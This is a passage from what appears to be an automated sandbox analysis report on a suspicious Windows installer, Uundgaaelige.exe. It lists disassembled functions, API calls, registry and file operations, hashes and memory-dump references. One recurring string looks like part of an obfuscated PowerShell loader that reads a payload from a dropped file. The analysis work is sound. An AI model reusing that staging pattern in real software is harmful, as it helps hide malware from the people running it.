                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt$C:\Users\user\AppData\Local\Temp\nsa17F6.tmp$C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dll$C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne$Destroy
                                                  • API String ID: 1941528284-2576502423
                                                  • Opcode ID: e928e46396d8dc3c4a4bdb24082dd825f8b0ff1d663bcc8c2bbd70b8c757518f
                                                  • Instruction ID: 2c94bdb1ed45b9066cdaff59bd30f99cb4fab6046a6a22cdc065c2defd4e90a3
                                                  • Opcode Fuzzy Hash: e928e46396d8dc3c4a4bdb24082dd825f8b0ff1d663bcc8c2bbd70b8c757518f
                                                  • Instruction Fuzzy Hash: CD41D871A00615BBCB10BFB5CC45EAF3669EF01329B21823FF522B10E1D77C89518A6E
                                                  Function 004051C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 633 4051c0-4051d5 634 40528b-40528f 633->634 635 4051db-4051ed 633->635 636 4051f8-405204 lstrlenA 635->636 637 4051ef-4051f3 call 4060bb 635->637 638 405221-405225 636->638 639 405206-405216 lstrlenA 636->639 637->636 642 405234-405238 638->642 643 405227-40522e SetWindowTextA 638->643 639->634 641 405218-40521c lstrcatA 639->641 641->638 644 40523a-40527c SendMessageA * 3 642->644 645 40527e-405280 642->645 643->642 644->645 645->634 646 405282-405285 645->646 646->634
                                                  APIs
                                                  • lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                  • lstrlenA.KERNEL32(00402D70,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                  • lstrcatA.KERNEL32(Completed,00402D70,00402D70,Completed,00000000,00000000,00000000), ref: 0040521C
                                                  • SetWindowTextA.USER32(Completed,Completed), ref: 0040522E
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Completed
                                                  • API String ID: 2531174081-3087654605
                                                  • Opcode ID: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
                                                  • Instruction ID: 0096fbd02e39835f1f24d83275f9c38cb3dbb50e4440d35a5143882a1b4174d0
                                                  • Opcode Fuzzy Hash: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
                                                  • Instruction Fuzzy Hash: 4D218C71900518BFDF119FA5DD84A9EBFB9FF04354F0480BAF904B6291C7798A418FA8
                                                  Function 00405686 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 647 405686-4056d1 CreateDirectoryA 648 4056d3-4056d5 647->648 649 4056d7-4056e4 GetLastError 647->649 650 4056fe-405700 648->650 649->650 651 4056e6-4056fa SetFileSecurityA 649->651 651->648 652 4056fc GetLastError 651->652 652->650
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
                                                  • GetLastError.KERNEL32 ref: 004056DD
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004056F2
                                                  • GetLastError.KERNEL32 ref: 004056FC
                                                  Strings
                                                  • C:\Users\user\Desktop, xrefs: 00405686
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004056AC
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                  • API String ID: 3449924974-1700792911
                                                  • Opcode ID: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                  • Instruction ID: f1d10c799bfca9e4ec05a1b7c6bbaf57c6c97cfabee98fddb41b1e3f6ffc1dc8
                                                  • Opcode Fuzzy Hash: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                  • Instruction Fuzzy Hash: 13010871D10259EADF109FA4C9047EFBFB8EB14315F10447AD544B6290DB7A9604CFA9
                                                  Function 004063C3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 653 4063c3-4063e3 GetSystemDirectoryA 654 4063e5 653->654 655 4063e7-4063e9 653->655 654->655 656 4063f9-4063fb 655->656 657 4063eb-4063f3 655->657 659 4063fc-40642e wsprintfA LoadLibraryExA 656->659 657->656 658 4063f5-4063f7 657->658 658->659
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                                                  • wsprintfA.USER32 ref: 00406413
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                  • Instruction ID: c4678dfb2da91d08484603cd09ba86b434f6c063b959f4a2bfe8732341513f46
                                                  • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                  • Instruction Fuzzy Hash: 69F0FC7054060967DB149768DD0DFEB365CEB08304F14057EA587E10D1D978D8358B98
                                                  Function 00401FFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 660 401ffd-402009 661 4020c4-4020c6 660->661 662 40200f-402025 call 402ac1 * 2 660->662 664 402237-40223c call 401423 661->664 673 402034-402042 LoadLibraryExA 662->673 674 402027-402032 GetModuleHandleA 662->674 670 402951-402960 664->670 671 402716-40271d 664->671 671->670 676 402044-402051 GetProcAddress 673->676 677 4020bd-4020bf 673->677 674->673 674->676 678 402090-402095 call 4051c0 676->678 679 402053-402059 676->679 677->664 683 40209a-40209d 678->683 681 402072-402086 679->681 682 40205b-402067 call 401423 679->682 685 40208b-40208e 681->685 682->683 691 402069-402070 682->691 683->670 686 4020a3-4020ab call 403889 683->686 685->683 686->670 692 4020b1-4020b8 FreeLibrary 686->692 691->683 692->670
                                                  APIs
                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                    • Part of subcall function 004051C0: lstrcatA.KERNEL32(Completed,00402D70,00402D70,Completed,00000000,00000000,00000000), ref: 0040521C
                                                    • Part of subcall function 004051C0: SetWindowTextA.USER32(Completed,Completed), ref: 0040522E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                                                  Strings
                                                  • "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt, xrefs: 0040207C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID: "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt
                                                  • API String ID: 2987980305-3164695810
                                                  • Opcode ID: 8fd21b30ed73b6f6f786ebc1ec8206b0e1275513e3166378783415f75d1dd210
                                                  • Instruction ID: b9fd2243ea981f5bcf097e6c9410b7191d7035710d5254353367cb498e194193
                                                  • Opcode Fuzzy Hash: 8fd21b30ed73b6f6f786ebc1ec8206b0e1275513e3166378783415f75d1dd210
                                                  • Instruction Fuzzy Hash: 2C21C971A04225A7CF207FA48E4DB6E7660AB44358F21413BF711B62D0CBBD4942965E
                                                  Function 00405C61 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 693 405c61-405c6b 694 405c6c-405c97 GetTickCount GetTempFileNameA 693->694 695 405ca6-405ca8 694->695 696 405c99-405c9b 694->696 698 405ca0-405ca3 695->698 696->694 697 405c9d 696->697 697->698
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405C75
                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405C8F
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C64
                                                  • nsa, xrefs: 00405C6C
                                                  • "C:\Users\user\Desktop\Uundgaaelige.exe", xrefs: 00405C61
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\Uundgaaelige.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3025724165
                                                  • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                  • Instruction ID: cf48cc2e124a12ae61d5b18fb9546061e9ffe7603c061e2a5f49afbd00461fe6
                                                  • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                  • Instruction Fuzzy Hash: F3F082363087047BEB108F55DC04B9B7F99DF91750F14803BFA48EA180D6B499648758
                                                  Function 004023D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 699 4023d0-402401 call 402ac1 * 2 call 402b51 706 402951-402960 699->706 707 402407-402411 699->707 709 402421-402424 707->709 710 402413-402420 call 402ac1 lstrlenA 707->710 713 402426-402437 call 402a9f 709->713 714 402438-40243b 709->714 710->709 713->714 715 40244c-402460 RegSetValueExA 714->715 716 40243d-402447 call 40303e 714->716 721 402462 715->721 722 402465-402542 RegCloseKey 715->722 716->715 721->722 722->706 724 402716-40271d 722->724 724->706
                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000023,00000011,00000002), ref: 0040241B
                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,00000011,00000002), ref: 00402458
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,00000011,00000002), ref: 0040253C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp
                                                  • API String ID: 2655323295-223556267
                                                  • Opcode ID: 749fbfa3bc1171952234d739aaee5af5159f0d83cebea7c125393352a3cebceb
                                                  • Instruction ID: f5012b3eed6b0e10d725da1925ea8f3c2a7a7eca851d842cc00ee1163223ef4a
                                                  • Opcode Fuzzy Hash: 749fbfa3bc1171952234d739aaee5af5159f0d83cebea7c125393352a3cebceb
                                                  • Instruction Fuzzy Hash: DA115471E00215BEDF10EFA5DE89A9E7A74EB44754F21403BF508F71D1CAB84D419B29
                                                  Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 725 402bb4-402bdd call 405f1f 727 402be2-402be4 725->727 728 402be6-402bec 727->728 729 402c5a-402c5e 727->729 730 402c08-402c1d RegEnumKeyA 728->730 731 402bee-402bf0 730->731 732 402c1f-402c31 RegCloseKey call 406431 730->732 733 402c40-402c4c RegCloseKey 731->733 734 402bf2-402c06 call 402bb4 731->734 739 402c33-402c3e 732->739 740 402c4e-402c54 RegDeleteKeyA 732->740 733->729 734->730 734->732 739->729 740->729
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C22
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C43
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Close$Enum
                                                  • String ID:
                                                  • API String ID: 464197530-0
                                                  • Opcode ID: 7700570c92338514809be4fe700ff97aaec082cd166b5f15edfff62a18f3ae9c
                                                  • Instruction ID: a71df8347eb47d58d859942eb4958fb6338d9c628d5ecfe9f9dc7c39a89e9901
                                                  • Opcode Fuzzy Hash: 7700570c92338514809be4fe700ff97aaec082cd166b5f15edfff62a18f3ae9c
                                                  • Instruction Fuzzy Hash: FA118832504119BBEF01AF91CF09B9E3B79EB04341F104036BA05B50E0E7B4DE61AA68
                                                  Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,?,00405B36,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0,00000000), ref: 00405AD8
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                    • Part of subcall function 00405686: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne,00000000,00000000,000000F0), ref: 0040163C
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne, xrefs: 00401631
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne
                                                  • API String ID: 1892508949-3937776109
                                                  • Opcode ID: 3fa8d630238dae7dc64077fdf6bf67edb74ad96a3ba327a4429a78609e5a06c3
                                                  • Instruction ID: e80d591928eb94818456189605928617e464058bd7b4ab9a9bc67e70efbf424e
                                                  • Opcode Fuzzy Hash: 3fa8d630238dae7dc64077fdf6bf67edb74ad96a3ba327a4429a78609e5a06c3
                                                  • Instruction Fuzzy Hash: D3112731208151EBCF217BB54D415BF26B0DA92324B28093FE9D1B22E2D63D4D436A3F
                                                  Function 00405F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,004061C4,80000002), ref: 00405FC6
                                                  • RegCloseKey.KERNELBASE(?,?,004061C4,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 00405FD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: : Completed
                                                  • API String ID: 3356406503-2954849223
                                                  • Opcode ID: 89fd80a38215459d753601d22b2c149a63a94ab0799c11bc238657d83ab6ff10
                                                  • Instruction ID: 18c902175c261954d743b78889848fcc164f2ce977d73a6ea322bbd2e465ffc2
                                                  • Opcode Fuzzy Hash: 89fd80a38215459d753601d22b2c149a63a94ab0799c11bc238657d83ab6ff10
                                                  • Instruction Fuzzy Hash: CD01BC7250020AABDF228F20CC09FDB3FA8EF54364F00403AFA05A2190D278CA14DFA8
                                                  Function 00405738 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                  Download Yara Rule
                                                  APIs
